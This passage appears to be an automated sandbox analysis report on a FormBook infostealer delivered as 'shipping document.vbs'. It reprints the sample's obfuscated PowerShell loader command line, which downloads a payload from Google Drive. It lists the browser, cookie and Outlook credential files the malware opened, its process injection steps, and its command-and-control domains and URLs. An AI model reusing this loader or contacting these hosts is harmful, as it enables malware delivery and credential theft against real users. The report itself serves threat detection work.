.lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430120 Sample: shipping document.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 53 www.ordinarythoughts.org 2->53 55 www.mz3fk6g3.sbs 2->55 57 4 other IPs or domains 2->57 71 Snort IDS alert for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 77 7 other signatures 2->77 12 wscript.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 93 VBScript performs obfuscated calls to suspicious functions 12->93 95 Suspicious powershell command line found 12->95 97 Wscript starts Powershell (via cmd or directly) 12->97 99 3 other signatures 12->99 21 powershell.exe 14 19 12->21         started        25 WmiPrvSE.exe 12->25         started        process6 dnsIp7 59 drive.usercontent.google.com 142.251.35.161, 443, 49707, 49716 GOOGLEUS United States 21->59 61 drive.google.com 142.251.41.14, 443, 49706, 49715 GOOGLEUS United States 21->61 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 27 powershell.exe 17 21->27         started        30 conhost.exe 21->30         started        32 cmd.exe 1 21->32         started        signatures8 process9 signatures10 89 Writes to foreign memory regions 27->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 27->91 34 wab.exe 6 27->34         started        37 cmd.exe 1 27->37         started        39 wab.exe 27->39         started        process11 signatures12 69 Maps a DLL or memory area into another process 34->69 41 NJeXDhPqkKUqTApfiOc.exe 34->41 injected process13 signatures14 85 Maps a DLL or memory area into another process 41->85 87 Found direct / indirect Syscall (likely to bypass EDR) 41->87 44 openfiles.exe 1 13 41->44         started        process15 signatures16 101 Tries to steal Mail credentials (via file / registry access) 44->101 103 Creates autostart registry keys with suspicious names 44->103 105 Tries to harvest and steal browser information (history, passwords, etc) 44->105 107 3 other signatures 44->107 47 NJeXDhPqkKUqTApfiOc.exe 44->47 injected 51 firefox.exe 44->51         started        process17 dnsIp18 63 www.a-two-spa-salon.com 157.7.107.63, 49720, 49721, 49722 INTERQGMOInternetIncJP Japan 47->63 65 www.jthzbrdb.fun 80.240.20.220, 49719, 80 AS-CHOOPAUS Germany 47->65 67 Found direct / indirect Syscall (likely to bypass EDR) 47->67 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.35.161
 drive.usercontent.google.com United States
15169 GOOGLEUS false
142.251.41.14
 drive.google.com United States
15169 GOOGLEUS false
157.7.107.63
 www.a-two-spa-salon.com Japan 7506 INTERQGMOInternetIncJP true
80.240.20.220
 www.jthzbrdb.fun Germany
20473 AS-CHOOPAUS true

Contacted Domains

Name IP Active
www.a-two-spa-salon.com 157.7.107.63 true
drive.google.com 142.251.41.14 true
drive.usercontent.google.com 142.251.35.161 true
www.mz3fk6g3.sbs 172.217.16.36 true
www.jthzbrdb.fun 80.240.20.220 true
www.ordinarythoughts.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.jthzbrdb.fun/3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== true
    		unknown
    http://www.a-two-spa-salon.com/3g97/ true
      		unknown
      http://www.a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 true
        		unknown